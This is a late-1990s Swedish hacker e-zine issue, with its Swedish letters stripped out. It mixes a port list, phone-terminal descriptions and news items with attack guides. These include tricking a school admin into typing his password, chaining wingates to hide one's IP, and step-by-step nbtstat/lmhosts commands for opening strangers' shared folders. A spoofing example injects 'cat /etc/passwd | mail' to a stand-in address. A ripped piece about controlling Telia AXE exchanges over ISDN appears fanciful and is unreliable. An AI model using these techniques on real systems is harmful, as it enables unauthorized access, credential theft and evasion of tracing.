 TCP/IP fr Paket verfring och Vxling.



 Hr kommer en lista p tjnster som andvnder tcp/ip  och udp.

 Jag har faktiskt rippat den frn //Windows/services [lamt va?]



echo                7/tcp

echo                7/udp

discard             9/tcp    sink null

discard             9/udp    sink null

systat             11/tcp

systat             11/tcp    users

daytime            13/tcp

daytime            13/udp

netstat            15/tcp

qotd               17/tcp    quote

qotd               17/udp    quote

chargen            19/tcp    ttytst source

chargen            19/udp    ttytst source

ftp-data           20/tcp

ftp                21/tcp

telnet             23/tcp

smtp               25/tcp    mail

time               37/tcp    timserver

time               37/udp    timserver

rlp                39/udp    resource      # resource location

name               42/tcp    nameserver

name               42/udp    nameserver

whois              43/tcp    nicname       # usually to sri-nic

domain             53/tcp    nameserver    # name-domain server

domain             53/udp    nameserver

nameserver         53/tcp    domain        # name-domain server

nameserver         53/udp    domain

mtp                57/tcp                  # deprecated

bootp              67/udp                  # boot program server

tftp               69/udp

rje                77/tcp    netrjs

finger             79/tcp

link               87/tcp    ttylink

supdup             95/tcp

hostnames         101/tcp    hostname      # usually from sri-nic

iso-tsap          102/tcp

dictionary        103/tcp    webster

x400              103/tcp                  # ISO Mail

x400-snd          104/tcp

csnet-ns          105/tcp

pop               109/tcp    postoffice

pop2              109/tcp                  # Post Office

pop3              110/tcp    postoffice

portmap           111/tcp

portmap           111/udp

sunrpc            111/tcp

sunrpc            111/udp

auth              113/tcp    authentication

sftp              115/tcp

path              117/tcp

uucp-path         117/tcp

nntp              119/tcp    usenet        # Network News Transfer

ntp               123/udp    ntpd ntp      # network time protocol (exp)

nbname            137/udp

nbdatagram        138/udp

nbsession         139/tcp

NeWS              144/tcp    news

sgmp              153/udp    sgmp

tcprepo           158/tcp    repository    # PCMAIL

snmp              161/udp    snmp

snmp-trap         162/udp    snmp

print-srv         170/tcp                  # network PostScript

vmnet             175/tcp

load              315/udp

vmnet0            400/tcp

sytek             500/udp

biff              512/udp    comsat

exec              512/tcp

login             513/tcp

who               513/udp    whod

shell             514/tcp    cmd           # no passwords used

syslog            514/udp

printer           515/tcp    spooler       # line printer spooler

talk              517/udp

ntalk             518/udp

efs               520/tcp                  # for LucasFilm

route             520/udp    router routed

timed             525/udp    timeserver

tempo             526/tcp    newdate

courier           530/tcp    rpc

conference        531/tcp    chat

rvd-control       531/udp    MIT disk

netnews           532/tcp    readnews

netwall           533/udp                  # -for emergency broadcasts

uucp              540/tcp    uucpd         # uucp daemon

klogin            543/tcp                  # Kerberos authenticated rlogin

kshell            544/tcp    cmd           # and remote shell

new-rwho          550/udp    new-who       # experimental

remotefs          556/tcp    rfs_server rfs# Brunhoff remote filesystem

rmonitor          560/udp    rmonitord     # experimental

monitor           561/udp                  # experimental

garcon            600/tcp

maitrd            601/tcp

busboy            602/tcp

acctmaster        700/udp

acctslave         701/udp

acct              702/udp

acctlogin         703/udp

acctprinter       704/udp

elcsd             704/udp                  # errlog

acctinfo          705/udp

acctslave2        706/udp

acctdisk          707/udp

kerberos          750/tcp    kdc           # Kerberos authentication--tcp

kerberos          750/udp    kdc           # Kerberos authentication--udp

kerberos_master   751/tcp                  # Kerberos authentication

kerberos_master   751/udp                  # Kerberos authentication

passwd_server     752/udp                  # Kerberos passwd server

userreg_server    753/udp                  # Kerberos userreg server

krb_prop          754/tcp                  # Kerberos slave propagation

erlogin           888/tcp                  # Login and environment passing

kpop             1109/tcp                  # Pop with Kerberos

phone            1167/udp

ingreslock       1524/tcp

maze             1666/udp

nfs              2049/udp                  # sun nfs

knetd            2053/tcp                  # Kerberos de-multiplexor

eklogin          2105/tcp                  # Kerberos encrypted rlogin

rmt              5555/tcp    rmtd

mtb              5556/tcp    mtbd          # mtb backup

man              9535/tcp                  # remote man server

w                9536/tcp

mantst           9537/tcp                  # remote man server, testing

bnews           10000/tcp

rscs0           10000/udp

queue           10001/tcp

rscs1           10001/udp

poker           10002/tcp

rscs2           10002/udp

gateway         10003/tcp

rscs3           10003/udp

remp            10004/tcp

rscs4           10004/udp

rscs5           10005/udp

rscs6           10006/udp

rscs7           10007/udp

rscs8           10008/udp

rscs9           10009/udp

rscsa           10010/udp

rscsb           10011/udp

qmaster         10012/tcp

qmaster         10012/udp



 -==- G vidare -==-

 

 MyWord II (IP Faking) - Myword r en  serie  textfiler  som  r

 vldigt  informativa, dom kan  bla. hmtas  p  swehack.cjb.net

 och i en av dem str det om IP Spoofing eller  IP  Faking  vlj

 sjlv vilket du tycker lter bst.



 A short overview of IP spoofing: PART I

 Simple Spoofing (Non blind) - r s pass knd s den finns lite

 hr och dr p olika hemsidor, det r  bara  ska  eller  maila

 mig om du vill ha den.



 A short overview of IP spoofing: PART II 

 Advanced spoofing (Blind) - r s pass knd s den  finns  lite

 hr och dr p olika hemsidor, det r  bara  ska  eller  maila

 mig om du vill ha den.



 Understanding IP Addressing

 http://www.3com.com/nsc/501302.html. Avancerad information  om

 hur IP addresseringen r uppbyggt och hur den fungerar.



 Simple Attack Against TCP

 Tutorial om IP Hijacking.



 Security Problems in the  TCP/IP Protocol Suite

 Beskriver olika hl och attacker i och mot TCP/IP, hgt rekomm-

 enderad.





 -==- Efterord -==-

 

 Jaja, det var bara en del av min privata TCP/IP utbildning, jag

 kan nstan garantera att det kommer mera avancerad  information

 om TCP/IP och olika  andra  internet  kommunikations  protokoll

 inom snaraste framtid. Om du tycker att jag skrev med en  aning

 annorlunda svenska s beror det p att jag inte p topp  fattar

 allt sjlv, efter som jag just genomgr min privata utbildning,

 s du skulle ju kunna kalla artikeln som en  uppsats. Men  utan

 betyg s  att  sga. Alla  flames  skickas  till /dev/null  men

 grna serisa kommentarer och tips hur jag  skulle  kunna  gra

 artikeln bttre uppskattas. Allt skickas till keytrace@usa.net.

 En del delar r versatta och en del rippade faktiskt. Men allt

 r inte helt rippat s kom  inte  och  klaga, jag  har faktiskt

 skrivit kllfrteckning. 





 -==- Tack Till -==-



 Gazzaud, pewp och apotygma





 -==- Kllor -==-

 

 The Basics of TCP/IP

 Introduction to the Internet Protocols

 TCP SYN Flooding and IP Spoofing Attacks

 TCP packet fragment attacks against firewalls and filters

 OSI reference model

 The TCP Header Fields 

 

 +-------------------------------------------------------------+

 |    Ls lokala filer i NT                        [Overmarzz] |

 +-------------------------------------------------------------+

 Den hr texten kommer att beskriva ett enkelt stt att f tag i

 windows/nt lsenord (.pwl) P min skola s r det  lsenord  p

 bios'en, dos gr inte att  kra (det kommer  upp  en  text  som 

 sger att man ska prata med  adminen), vi  har  bara "Logga av" 

 och "Program" i startmenyn, I.E r sprrat fr att lsa  lokala 

 filer och vi har inga ikoner p skrivbordet. Det kan tyckas som

 om det vore svrt att f en pwl fil men INTE. Jag testade allt, 

 bla word. Word visade sig vara ett prakt exempel p hur man kan 

 lsa lokalt i NT :) Man  kunde  klicka   p c:\ men  det  hnde 

 inget, s jag tryckte p favoriter. vips s var c:\windows\fav-

 oriter uppe och drifrn klickade jag ett steg tillbaka s  jag 

 hamnade i  c:\windows. Ok  tnkte  jag, det  var  kul. Men  vad 

 tjnar jag p det? Jag har nnu inte hunnit testa detta jag ska 

 bertta nu och har hrt att inloggnings lsen inte sparas i pwl 

 ... i s fall..synd! men alla fall...Dra ut den fula TP  kablen 

 och spring till adminen som en idiot 

 

 J = Jag  L = Lam Admin 

 J - Dator 11 funkar inte..man kan inte logga p

 L - Oj bst JAG tar en titt.. 

 

 I dator salen s kommer adminen frst prva logga p..



 L - Nh, det var konstigt, jag som r 37331 :/

 J - Humm..(stirrar p sladden) Ska inte den sitta i?

 L - Jo, heh..(glad och samtidigt stolt att han lste problemet)

 J - Prva om det funkar nu

 L - Well kid..You read my mind .. :) 



 Adminen prvar logga p med sitt user/pass ..

 OM nt SPARAR inloggnings lsenordet s r det krt fr honom :)

 annars s kan man ju alltid pilla i systemet :)

 Ok, jag inser att denna filen r lam, men  den  br  lsas  med 

 lite ironi



 +-------------------------------------------------------------+

 |    Wingates                                     [Overmarzz] |

 +-------------------------------------------------------------+

 (Denna txt'n r versatt, den riktiga finns p 

 hackersclub) Wingates r ett bra alternativ fr  sker  hacking

 Mnga wingates loggar allt men sen finns det  ju  ven  anonyma

 sdana (hur skulle man annars klara sig :)



 Denna sortens spoofing kallas non-blind spoofing Du har  en  ip 

 fast du gr igenom andra servrar



 Blind IP spoofing r otroligt avancerat..

 Det r nr man frutser TCP sequence  number  av  ett 'trusted'

 TCP session mellan tv tv andra machiner och hijack'ar  sjlva 

 session genom att modifiera hans IP adress och "injecerar"  ett 

 binart commando ex "cat /etc/passwd | mail nn@ting.hr".

 Och det r svrt... Men om du verkligen vill lra dig om det s 

 finns det 2-3 bra txt filer om det p min hemsida



 Hur du anvnder wingates rtt

 

 Vi antar att jag har 3st wingates



 24.231.12.1 = A

 24.103.43.5 = B

 24.234.13.2 = C 



 (Om du har windows)

 Som alla vet s  r  ju  telnet  clienten  (windows)  det  nda 

 verktyg som man anvnder mycket vid "hacking" (kanske lite sta-

 rkt ord)



 Connecta till A i telnet

 Prompten kommer att se ut s hr:



 WinGate>



 Hr kan du connecta vidare till andra servrar

 bra tnker du...

 Men r man paranoid som jag s kan det bli bttre



 connecta nu till wingate B



 WinGate>24.103.43.5



 Och samma prompt kommer upp..

 Nu kan du connecta till wingate 3 osv, fr att till sist

 connecta till den server som du tnkte ..... eller vad du

 vill gra..



 Din burk -> Din isp -> A -> B -> C -> till den du vill till..



 Detta kommer att f effekten att din ip blir svr att spra



 Bara A ser din riktiga IP - B B ser A's IP - C ser B's IP osv..



 Om du vill connecta till andra portar s kan du sjlvklart gra 

 det genom denna enkla frndring



 WinGate>121.433.23.1:port_nummer



 +-------------------------------------------------------------+

 |    Skerhets hl i Netbios                          [Knash] |

 +-------------------------------------------------------------+

 

 System: Windoze 95, NT





  Z-Attack = Personen som attackerar :)





 Det har upptckts att ngon med ett Win95 system kan "remotly"

 skaffa sig tillgng till delade (shared)  mappar  p  Win95/NT

 system. Z-Attack andvnder sig av nbtstat  fr  att  lista  de

 aktuella  netbios  sammantrdande  datorerna. Z-Attack  lgger

 till dator namnet i  sin c:/Windows/lmhosts. Han  sker  efter

 datorns namn som han la till i lmhosts. Han sker efter datorn

 och frhoppningsvis visar en ikon sig. D fr han access  till

 alla icke lsenords skyddande mappar.



 S hur utfr du detta praktiskt ?

 



  - Steg 1



 Hr r kommandot du ger som indata i ditt MSDOS skal

 

 <nbtstat -A ipaddress#>



 Om det nu r en netbios session som  du  ser  s  ger  nbtstat

 utdata genom att visa de olika datorerna i en lista. De frsta

 namnet du ser.



  - Steg 2



 ppna c:/Windows/lmhosts och lgg till: ipaddress namnpdatorn



 ipadress    : ip adressen till dator som  du  vill  komma  t.

 namnpdatorn: namn p datorn som du vill komma t.



 Spara det och ta bort din egen netbios session.



  - Steg 3



 Ge kommandot <nbtstat -R> som sedan borde ge purge succsessfu-

 l, om inte s r det vl kanske ngot ntverks fel eller nt.



  - Steg 4



 Nu kan du g och ska  efter  datorn (sk p datorns namn)  om 

 den nu visar en st  liten ikon, dubbelklicka p den  och  sen 

 SKA du se alla delade mappar.



  | Lsning p problemet |



 Jag tnke vara snll mot alla LAMA NTVERKS ADMINISTRATRER och

 sga att det finns en lsning till detta. Visserligen r netbi-

 os problemet ganska omfattande. Men det bsta du  kan  gra  r

 att stta lsenord p alla delade mappar. 



 +-------------------------------------------------------------+

 |    nato.int, whitehouse.gov hacked                 [Axxezz] |

 +-------------------------------------------------------------+

 Det har nu blivit knt att www.nato.int samt www.whitehouse.gov

 har blivit hackade utav ryska hackers som en protest mot NATO:s

 bombningar mot det forna Jugoslavien. Det verkar som tom de me-

 st bevakade sidorna fortfarande ltt kan hamna i  farozonen  s 

 lnge dessa hackers har den rtta motivationen. NATO  har  nnu 

 inte uttalat sig om detta hack och Vita  Huset pstr  att  det 

 var pga en hardvaru krash som sidan var nere nstan 2 dygn.



 Klla: SAFER



 +-------------------------------------------------------------+

 |    Enkelt om Terminaler                             [Knash] |

 +-------------------------------------------------------------+

 Jag tnke faktiskt ta upp lite om terminaler. Jag ska frklara

 vad dom andvnds till och hur dom ser ut, inte mycket mera  n

 s.



 Mlgrupp: Extrema wannbee phreakerz (men inte s mnga kanske

           vet vad de riktiga namnen fr terminalerna r och

           inte mnga har stt oranga (LME:OR) terminaler och

           inte heller turkosa terminaler (3M:or)





   -=- Flames skickas ju till /dev/null sklart -=-



  + Terminal i helhet

  + LSA Plus (Den vita terminalen)

  + OLDschool (Den svarta terminalen)

  + LME (Den oranga terminalen)

  + 3m (Den turkosa terminalen)



  -=o[ Terminal i helhet ]o=-



 Det finns vl olika namn, personligen kallar jag dem fr Term-

 inaler men det finns  dom  som  kallar  dem  Centraler  ocks.

 Terminalen sammankopplar flera linor fr att sen skicka ut dem

 i en i en enskild kabel som gr till C-Skpen som kopplar ihop

 100 linor som sen skickas i en enskild kabel till Kocentratio-

 ns Centralerna.





  -=o[ LSA Plus ]o=-



 Har funnits ett tag sitter i de gr  Kopplingsboxarna  som  r

 gjorda av metall (idiotfrklaring) ven kallade Metall Jappsa-

 re. Metall Jappsaren r ett frdelningsskp av  telelinor. Men 

 till sjlva terminalen som  sammanbinder kablarna (telelinorn-

 a) En LSA Plus klarar att sammankoppla  max  20 linor  och  r

 12cm lng, 2cm hg och 1,5cm bred.

 

 LSA Plus r faktiskt de  namnet  som  telia  andvnder, det r

 sjlva produktnamnet. Populrt bland Phreakers kallas termina-

 len faktiskt enkelt och oserist fr  Vit  terminal. Jag  hade

 faktiskt inte tnkt  mig  att  frklara  allt  fr  mycket, se

 Mlgrupp i brjan av artikeln.





  -=o[ OLDSchool ]o=-



 Den mest knda terminalen sjlvklart, har funnits  sen  farfar

 lekte i sandldan. Finns som standard i de runda Kopplingsbox-

 arna med svart  topp. Terminalen  r  helsvart  med  utstende

 skruvar som sitter p  plintar. Terminalen  sammankopplar  som

 max 10 linor. OLDsch00l r 10,5 cm  lng, 1,2cm  hg  och  9mm

 bred.





  -=o[ LME ]o=-



 LME Terminalen r helorange och nstanlikdant byggda  som  den

 svarta men lite mindre och att skruv plintarna sitter  en  bit

 in i sjlva terminalen, nackdelen blir d  att  man  inte  kan

 knppa p krokodil klmmor, men annars  kan  man  ju  andvnda

 nlar eller liknande (andvnd kreativiteten)

 Den oranga LME Terminalen kan sammankoppla som  max  10  linor

 och r 9,3cm lng, 1,7cm hg och 2cm bred. Hmm  som  jag  sagt

 heter ju terminalens synonym  betckning LME, hmm,  LME r ett

 gammalt moder-bolag till Ericsson (LME=LM Ericsson) LM ericss-

 r ett gammalt telebolag som sysslade med vxlar och shit. Men

 den vita LME terminalen r relativt ny. Hur gr det ihop ?





  -=o[ 3m ]o=-



 3m Terminalen r smart byggt, jag hittade faktiskt den  i  ett

 lst kllarrum (en korridor p 200m) den satt fast i  ett fett

 magasin med en massa terminaler. Den sammankopplar som de fle-

 sta max 10 linor, ocks  storlek  och  skit: 7cm lng, 2cm hg

 och 17mm bred.



 +-------------------------------------------------------------+

 |    GSM kan lsa av Elmtare                         [Knash] |

 +-------------------------------------------------------------+

 Trdls energiavlsning via GSM-ntet. Med ny teknik kommer det 

 bli mjligt. Telias utvecklingsbolag Wireless Maingate  AB  ska 

 utveckla  tekniken  tillsammans  med  Enermet  som  r  ledande 

 leverantr av utrustning som  avlser  energifrbrukning. Genom 

 att lsa av sina kunders elmtare via GSM kommer energifretag-

 en spara mycket tid och pengar. De slipper skicka ut en  person 

 som ska gra mtningarna. Enermet har  sedan  tidigare  tecknat 

 ett avtal med Ericsson gllande GSM-terminaler fr energimtar-

 e. Fr att kunna erbjuda en helhetslsning fr  energiavlsning 

 via GSM krvdes en operatr som kan  hantera  de  nya  krav  p 

 kommunikationslsningar som den hr marknaden stller. MainGate 

 r fokuserade p tjnsteutveckling fr  maskiner. Med  MainGate

 som samarbetspartner f vi  tillgng  till  en  bred  kompetens 

 inom telecom och IT, det tillsammans  med  Telias  rikstckande 

 GSM-nt   strker  vra  mjligheter  att  lyckas, sger  Bengt 

 Sundling, VD  p  Enermet  AB. Telia  tror  att  marknaden  fr 

 GSM-lsningar fr maskin till maskin kommer  vxa. De  berknar 

 att 30 procent av GSM-trafiken utgras av mobil data  r  2001.

 

 Rippat frn: www.mkf.se/nyheter/



 Detta kan ju betyda att  lite  roliga  security  holes  bildas.

 Kanske kommer det sitta SIM kort i elmtaren, eller nnu enkla-

 re i sjlva boxen.



 +-------------------------------------------------------------+

 |    Cellulr styrning, update                        [Knash] |

 +-------------------------------------------------------------+

 Angenda artikeln "Promenad: Cellulr styrning" i Outlaw-04  s

 har jag(vi) studerat lite. Har hittat en artikel i "Veckans no-

 tiser om Mobil" som du finner ovan. Boxen  tyder  starkt p att

 det r en elmtare. Fr det frsta s sitter ett fett mrke dr

 det  str "Mtarskpet  skall  hllas lst" mtarskp (hmm, har

 kanske ngot med elmtare att gra?) Sen  s  ser den i princip

 ut likadan med siffor och dyl. Det sitter ven en massa proppar

 som i ett mtarskp dr elmtaren brukar befinna sig.



 +-------------------------------------------------------------+

 |    Lite rippat om AXE frn Fidonet                  [Knash] |

 +-------------------------------------------------------------+

     ___________________________________________________



     # Snabba verfringar ver det digitala telentet #



     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



     

 Insnd av Hkan Andersson, 2:201/601

 Av Bjrn Felten, 2:203/208



 Som ni frmodligen knner till, s kan Telias operatrer  logga 

 in p AXE- stationerna via fjrranslutningar fr att utfra det 

 mesta som behvs. Detta sker via  det  digitala  telentet, och 

 gr naturligtvis inte att gra utifrn de analoga inkopplingar-

 na.  



 Men vad Telia kanske inte har tnkt p, r att ven vanliga ab-

 onnenter med ISDN ligger ute p  det  digitala  ntet. Det  gr 

 sledes utmrkt att via ett vanligt ISDN-abonnemang fixa en hel 

 del roliga saker p AXE - stationen. Protokollet, som  anvndes 

 r en helt vanlig Kermit, fast med reverserad CRC.  



 En av de roligare  finesserna  r  den, som  anvndes  nr  man 

 felanmler ett abonnemang. D kopplar operatren, som tog  emot 

 din felanmlan, om din AXE- station s att den ett kort gonbl-

 ick ger en helt digital anslutning hela vgen  fram  till  alla 

 dina telefoner och modem. Detta fr att kunna utfra mtningar, 

 som inte r mjliga via det analoga ntet. Du har  helt  enkelt 

 ftt en ISDN-lina under ett kort  gonblick! Detta  kallas  fr 

 ServiceIngng till LinjeLyssnaren, eller SILL. 

 

 Detta, tillsammans med det servicelge som alla modem  med  V34 

 har, och som ibland yttrar sig ven vid vanlig drift, genom att 

 modemet pltsligt brjar  lta  som  ett  flipperspel, som  har 

 tiltat, ger intressanta 



 mjligheter. Servicelget r avsett fr  att  modemtillverkaren 

 skall kunna prova modemen snabbt och enkelt. Det gr (naturlig-

 tvis) inte att komma in i detta lge frn modemet sjlvt, genom

 ngon AT-kod, utan initieras genom en  speciell  sekvens  under 

 handskakningens frsta 500ms, och som genereras av den speciel-

 la testutrustning, som tillverkaren  har. Denna  handskakningen 

 kommer fr vrigt alltid frst, s en sdan connect  tar  hgst 

 en halv sekund att etablera. Tyvrr  gr  det  inte  att  komma 

 ifrn det fruktansvrda oljudet, s detta r ingenting fr  den 

 som sover med basen under huvudkudden... :)



 I detta servicelge gr modemet  helt  digitalt, och  modulerar 

 allts inte signalen fr transport ver det analoga ntet, utan 

 det r rena ettor och nollor som sndes. Och detta med den max-

 imal a hastighet,  som   modemets  handskakning  medger. I  den 

 interna testloopen (enbart modemet) ligger det p kring 2M bps, 

 och i den externa r det den anslutna  serieporten, som  stter 

 grnsen. De flesta serieportar idag klarar 115k bps, men  vissa 

 klarar nda upp till 230k bps. Detta r allts den verfrings-

 hastighet, som blir resultatet. Det  senare  motsvarar  ungefr 

 40000 cps eller en Mbyte p 25 sekunder...     

 

 Nu har jag ntligen ftt klart mitt lilla hack, som fixar  allt 

 detta frn ISDN-sidan. Det ringer allts upp AXE-stationen, ko-

 pplar om den till digitalt lge nda fram till valfritt V34-mo-

 dem, ppnar modemet i testlget och skickar/ hmtar sedan filer 

 o.dyl. i den maximala



 Rippat frn: Fidonet



 +-------------------------------------------------------------+

 |    Teleutrustning som klarar r2000                 [Knash] |

 +-------------------------------------------------------------+

 Ondiga artiklar/textfiler finns verallt. Varfr inte frstr-

 a och gra dem fler. Nedan r en  lista  p  telefonvxlar  och

 lite teleutrustning som r r2000 kompatibla. 



 Rippat och klart !





 PBX SOM KLARAR R 2000

                         

 Leverantr (System)      Produkt         Kommentar 

 Alcatel (PBX)            A4400, A4200E 

 Direcom                  Nitsuko NX64 

 Direcom                  Teleste 2000/2200 

 Doro (PBX)               Doro AX-8, AX-8M, AX-32,

                          AX-32M, 

                          Doro Trippel 10 

                          Doro Median 

                          Doro Link 

                          Doro DX-E 

                          Doro System Cordless 

                          Doro System 2/24, 2/320 

                          Doro Minivxel 1/4, 2/6, 

                          Doro ISDN 2/8 

                          Doro Index, Doro Index

                          DECT 

                          COBS System 2000 

                          Siemens Hicom 112, 118 

                                                                

 Goldstar-Licencia        GSX 208,

 (PBX)                    GSX 408/816, 

                          GSX 1224, 

                          GSX 1832/3672/36112,

                          GHX 820,                                            

                          GDK 162/186, 

                          GDK 100, 

                          GDK FP II 

                                                                

 Nortel (PBX)             Meridian R16, 

                          Meridian R18, 

                          Meridian R20, 

                          Meridian R21, 

                          Meridian R22, 

                          Companion (Trdlst) 

 

 Philips (PBX)            Sophos-s50 ssw-640, 

                          Sophos-s100 ssw-640, 

                          Sophos-s250 ssw-640, 

                          Sophos-s1000 ssw-640, 

                          Sophos-s55, ssw-200,205 

                          Sophos-s255,

                          ssw-200,205 

                          Sophos-2500,ssw-700-730 

                          Sophos-1025, ssw- 730 

                                                                

 Telia (PBX)              se lista p: www.telia.se 

                          verst p sidan 



                          



 vriga system som klarar r 2000

                         

 Leverantr (System)         Produkt Kommentar

 Direcom

 (Snabbtelefonvxel)         ITT511 

                                                              

 Ericsson

 (Snabbtelefonvxel)         ASE43X 

                                                              

 Ericsson

 (Snabbtelefonvxel)         ASA10101 

                                                              

 Ericsson, AsaCorn

 (Snabbtelefonvxel)         ASA10103 

                             ASA10105 

                             ASA10107 

                                                             

 Goldstar-Licencia (CTI)     PBX-link, 

                             PBX popup, 

                             PBX telecon. 

                                                              

                          

 Nortel ( ACD)               Meridian Max rel. 8

 Nortel (Samtalsdebitering)  Meridian CCR rel. 6.03 

 



 Listan r rippad frn: Landstingsfrbundet



 +-------------------------------------------------------------+

 |    Copyright                                        [Knash] |

 +-------------------------------------------------------------+

 Jupp, copyright och inte copyfight faktiskt. Ni  kan  ju  rippa

 en artikel frn zinet och skriva klla om ni snackat med mig om

 det. Zinet fr spridas lite hit och dit s  lnge  det  stannar

 ondrat.



 +-------------------------------------------------------------+

 |    Prenumeration                                    [Knash] |

 +-------------------------------------------------------------+

  

  -==- S-T-A-R-T-A  P-R-E-N-U-M-E-R-A-T-I-O-N -==-

 

 Skicka ett litet mail till keytrace@usa.net  med  Subscribe O-I

 i subjekt fltet.



  -==- A-V-S-L-U-T-A  P-R-E-N-U-M-E-R-A-T-I-O-N -==-



 Skicka ett litet mail till keytrace@usa.net med Unsubscribe O-I

 i subjekt fltet.



 +-------------------------------------------------------------+

 |    eX1t()                                                   |

 +-------------------------------------------------------------+



              ___          .     .                 

            .'   `. ,   . _/_    |     ___  ,  _  /

            |     | |   |  |     |    /   ` |  |  |

            |     | |   |  |     |   |    | `  ^  '

             `.__.' `._/|  \__/ /\__ `.__/|  \/ \/ 

                      I N F O R M A T I V A



                      Heretics Inc. 

                       Ascii Development group.

                       editor cotact: knash@linux.nu